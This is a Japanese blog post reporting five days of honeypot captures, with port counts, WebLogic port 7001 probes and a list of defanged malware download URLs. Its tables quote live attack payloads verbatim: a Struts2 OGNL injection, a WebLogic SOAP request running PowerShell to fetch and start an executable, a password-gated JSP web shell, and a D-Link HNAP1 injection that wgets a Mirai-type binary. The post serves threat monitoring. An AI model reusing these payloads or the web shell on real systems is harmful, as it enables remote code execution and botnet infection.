【ハニーポット】Honeytrap簡易分析(73-77日目:10/20-10/24)
Honeytrapの73-77日目の簡易分析となります。
10/22(月)にDoS攻撃を受けましたが、TCPのみしか取得していなかったため攻撃の詳細までは取得できていませんでした。わかる範囲で別途、ブログに纏めたいと思います。
<宛先ポート>
|
宛先ポート
|
検知数 |
| 445 | 7968 |
| 22 | 399 |
| 3389 | 299 |
| 7001 | 224 |
| 8822 | 220 |
| 7002 | 203 |
| 9001 | 184 |
| 2222 | 170 |
| 8022 | 156 |
| 222 | 154 |
Weblogicで利用されているポート 7001の通信が増加していました。気になったので、7001ポート宛の通信を以下に纏めてみました。
| ペイロード | 検知数 |
| GET /bea_wls_deployment_internal HTTP/1.1 | 215 |
| GET / HTTP/1.1 | 1 |
| GET / HTTP/1.1..Host: xxx.xxx.xxx.xxx:7001 User-Agent: HTTP Banner Detection(security.ipip.net) |
1 |
| GET /invoker/readonly | 1 |
| GET /verifylogin.do HTTP/1.1 Content-Type: %{(#test='multipart/form-data') (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS) (#_memberAccess?(#_memberAccess=#dm) :*1. (#ognlUtil.getExcludedPackageNames().clear()). (#ognlUtil.getExcludedClasses().clear()). (#context.setMemberAccess(#dm)))). (#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())). (#ros.println(55*55+1)).(#ros.flush())} |
1 |
| POST /wls-wsat/CoordinatorPortType11 HTTP/1.1 <soapenv:Envelope xmlns:soapenv="hxxp://schemas.xmlsoap.org/soap/envelope/"> ~省略~ <void index="0">.. <string>cmd</string>.. </void>.. <void index="1">.. <string>/c</string>.. </void>.. <void index="2">.. <string>powershell (new-object System.Net.WebClient).DownloadFile('hxxp://a46.bulehero.in/download.exe','C:/14.exe');start C:/14.exe</string> ~省略~ |
3 |
| PUT /indexweb4.jsp/ HTTP/1.1.<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%> <%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder(); try {. Process pro = Runtime.getRuntime().exec(c); BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream())); String temp = null;.. while *2 != null) { line.append(temp+"\\n");..}. buf.close();..} ..catch (Exception e) {.. line.append(e.getMessage());..}..return line.toString();..}..%> <%..if("bala123".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))) {.out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");..}..else..{.. out.println(":-)");..}..%> |
1 |
| t3 12.2.1.AS:255.HL:19.MS:10000000.PU:t3://us-l-breens:7001.. | 1 |
ダントツで多かった通信内容は「GET /bea_wls_deployment_internal HTTP/1.1」でした。10月にOracleのパッチアップデートがあったので、その脆弱性を利用するための調査行為かもしれません。
t3プロトコルの通信も来ていましたが、途中で切れてしまっているため、通信内容の詳細は不明です。他の脆弱性を狙ったものはありましたが、特に新しい脆弱性を狙ったものはありませんでした。
<マルウェアダウンロード>
| 宛先ポート | |
| 52869 | hxxp://76[.]74[.]177[.]230/seraph[.]mips |
| 52869 | hxxp://107[.]191[.]99[.]230/loli[.]mips |
| 52869 | hxxp://76[.]74[.]177[.]230/hakai[.]mips |
| 5555 | hxxp://80[.]211[.]117[.]113/bc |
| 5555 | hxxp://188[.]209[.]52[.]142/c |
| 5555 | hxxp://185[.]162[.]130[.]187/adbs2 |
| 5555 | hxxp://27[.]102[.]115[.]44/adbs2 |
| 8081 | hxxp://185[.]244[.]25[.]131/Botnet[.]mips |
| 52869 | hxxp://89[.]248[.]171[.]57/gpon |
◾️8081ポートのマルウェアダウンロード
D-Linkルータの脆弱性(CVE-2015-2051)を狙った攻撃であり、Mirai系のマルウェアでした。
POST /HNAP1/ HTTP/1.0
SOAPAction: hxxp://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget hxxp://xxx.xxx.xxx.xxx/Botnet.mips &&
以上となります。
